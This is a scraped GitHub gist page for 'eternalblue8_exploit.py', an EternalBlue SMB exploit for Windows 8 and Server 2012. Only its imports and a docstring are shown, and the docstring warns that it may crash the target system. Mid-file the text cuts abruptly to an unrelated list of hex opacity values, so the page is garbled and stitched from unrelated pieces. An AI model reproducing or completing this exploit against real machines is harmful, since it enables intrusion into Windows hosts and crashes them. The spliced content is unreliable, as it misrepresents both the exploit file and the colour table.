Skip to content

Instantly share code, notes, and snippets.

View Yoosen's full-sized avatar
😵‍💫
Focusing

Yoosen Yoosen

😵‍💫
Focusing
View GitHub Profile
@Yoosen
Yoosen / eternalblue8_exploit.py
Created May 18, 2017 11:48 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
Hex Opacity Values
100% — FF
95% — F2
90% — E6
85% — D9
80% — CC
75% — BF
70% — B3
65% — A6